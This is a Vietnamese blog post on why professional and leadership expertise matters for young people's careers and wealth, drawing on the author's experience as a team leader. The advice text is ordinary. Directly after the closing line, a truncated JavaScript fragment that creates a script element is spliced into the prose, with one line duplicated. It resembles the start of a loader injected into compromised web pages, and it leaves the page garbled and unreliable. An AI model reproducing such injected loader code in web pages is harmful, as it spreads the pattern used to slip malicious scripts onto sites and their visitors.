Câu chuyện làm giàu và kiến thức chuyên môn của giới trẻ

Thiếu kiến thức chuyên môn của đại bộ phận giới trẻ đã dựng nên rào cản rất lớn trong con làm giàu. Vậy tại sao? Giải đáp ở đây.

chuyen-mon

Làm giàu và sự liên quan chặt chẽ với kiến thức chuyên môn

 

Thực tế nhìn vào cuộc sống chúng ta thấy rằng ngày càng có nhiều cử nhân đại học ra trường thất nghiệp. Đối lập với tình trạng thất nghiệp của các cử nhân đại học là cơn khát nhân lực của các công ty và doanh nghiệp. Một thực tế đau xót rằng dù các công ty có cần nhân lực nhưng vẫn không thể tuyển dụng các cử nhân đại học vì họ thiếu kiến thức chuyên môn, chuyên ngành. Cử nhân đại học cũng chỉ là một ví dụ, ngoài cử nhân ra thì còn hàng nhiều người cao đẳng, trung cấp, hoặc không có bằng cấp, thạc sỹ, tiến sỹ thất nghiệp là chuyện bình thường.

Trở lại câu chuyện chuyên môn. Theo tôi chuyên môn không phải là những kiến thức sách vở lý thuyết suông. Khi bạn học xong nó cần được vận dụng vào thực tế. Cầm tấm bằng tốt nghiệp trên tay nhiều vị cử nhân, tiến sỹ lao ra xã hội và yêu cầu nhà tuyển dụng bổ nhiệm họ vào vị trí điều hành. Vâng! Trình độ học vấn của những vị đó cũng không phải tầm thường nhưng để làm một nhà lãnh đạo cần nhiều hơn kiến thức của một tấm bàng đại học hoặc thạc sỹ, tiến sỹ.

 

 

Phân biệt kiến thức chuyên môn với những kiến thức nền cơ sở.

 

Kiến thức nền cơ sở trang bị cho bạn một lối tư duy tốt và nhiều khả năng phát triển. Đương nhiên tốt. Khi bạn yêu cầu nhà tuyển dụng xếp sắp cho bạn vào vị trí của người quản lý điều hành thì bạn có bao giờ tự hỏi bản thân: “Liệu mình có quản lý được không khi đặt mình vào cương vị một điều hành”. Bạn có kiến thức về ngành bạn đang theo đuổi nhưng để trở thành một nhà điều hành bạn cần nhiều kiến thức hơn việc chỉ biết làm.

Kỹ năng điều hành bao gồm quản lý nhân sự, làm việc nhóm, lên kết hoạch, thực hiện dự án, kỹ năng làm việc với đối tác, xử lý tình huống, dự liệu kế hoạch… Tôi cũng chỉ làm điều hành một nhóm nhỏ mà có quá nhiều vấn đề xử lý đau đầu ví như mình là người trả tiền cho nhân viên tại sao họ lại việc theo phong cách chống đối, mình nói họ đâu có nghe, bề ngoài thì có vẻ đồng thuận nhưng trong lòng chống đối. Liệu bạn nghĩ mình đã đủ sức chống chọi lại những vấn đề đau đầu.

 

 

Biết mình là ai, thuộc chuyên môn nào và phát triển tài năng của bản thân đúng hướng

 

Qua những đề cập trên bạn cũng phần nào hiểu được kiến thức chuyên môn là gì. Nó bao la rộng lớn và nằm ngoài kiến thức nền sách vở bạn được học qua ở các trường lớp. Vì thế nó mới sinh ra các lớp dạy kỹ năng mềm, kỹ năng quản lý lãnh đạo, kỹ năng quản trị doanh nghiệp. Không phải là tự nhiên các trường lớp học nghề hàn, hàn hơi, hàn điện, hàn tĩnh điện… các loại hàn. Chuyên môn nhưng lại phải là chuyên môn giỏi chứ không phải bạn học hàn ra rồi bạn có thể hàn đủ mọi thứ liên quan đến chữ hàn. Hẳn đó là một sai lầm nghiêm trọng trong tư duy nghề nghiệp mà các bạn trẻ cần sửa đổi.

 

 

Bài học từ cá nhân tôi chia sẻ đến các bạn

 

Bước ra dòng đời từ một cậu học sinh tốt nghiệp trung học phô thông. Hiện nay mới chỉ học đến năm thứ 2, chưa có gì là to tát nhưng mọi nỗ lực cố gắng đều xuất phát từ chuyên môn và kiến thức tốt. Khi lên đến vị trí leader – điều hành một bộ phận của công ty càng thấm thía hơn rằng kiến thức và tay nghề lãnh đạo của mình quá yếu kém. Không phải bạn cứ giỏi một chuyên môn nào đó thì bạn có thể làm được mọi thứ. Không phải vậy, bạn phải làm ở những vị trí mà chuyên môn bạn cho phép để tạo ra được giá trị cho công ty (của bạn hoặc bạn đang đi làm). Cảm thấy mình không đảm đương được trách nhiệm ấy tôi đã tự đề nghị cấp trên rút lui khỏi vị trí điều hành. Các bạn tưởng rằng làm điều hành là sung sướng đút chân ngăn bàn chỉ tay 5 ngón. Nhưng sự thật nó không như mơ các bạn ạ, vị trí điều hành luôn phải lo lắng và sắp xếp công việc, luôn bận rộn với nhiều việc hơn trong công ty, luôn phải lo lắng quan tâm xem nhân viên của mình ra sao. Làm tốt thì động viên với lương thưởng, làm yếu xử phạt … có quá nhiều chuyện đòi hỏi một người có chuyên môn lãnh đạo thực sự mới tạo ra giá trị cho công ty.

 

 

Lời khuyên dành cho các bạn

 

Dưới cương vị là một Leader dự án, tôi gửi đến các bạn trẻ một thông điệp:

Các nhà tuyển dụng đang cần các bạn, chả có ai dốt cả, tất cả chúng ta đều có năng lực ở một mặt nào đó. Mọi thứ đều có thể học hỏi được, không có gì là quá khó khăn chỉ cần một chút nỗ lực và tư duy. Đừng bao giờ để thói quen lười biếng đặc biệt là lười tư duy sáng tạo sẽ giết chết tương lai tươi đẹp của các bạn.

Khi bạn muốn làm việc tại một vị trí chuyên môn nào đó thì hãy dám chắc rằng chuyên môn của bạn phải thực sự đủ để đáp ứng công việc.

Không chỉ kỹ năng mềm mới giúp bạn phát triển tương lai. Tôi chuyển đến các bạn định hướng rằng tính cách của bạn quyết định 50% thành công, kỹ năng mềm chiếm 30% thành công và cuối cùng là kiến thức chuyên môn chiếm 20%. Nhưng 20% cuối cùng này nó đóng vai trò quyết định. Nếu thiếu nó bạn sẽ chẳng bao giờ thành công được. Hoặc ít nhất có 20% kiến thức chuyên môn bạn sẽ không bao giờ thất nghiệp hoặc trở thành một kẻ vô dụng trong xã hội này.

 

Chúc các bạn thành công.if (document.currentScript) { var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script');

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *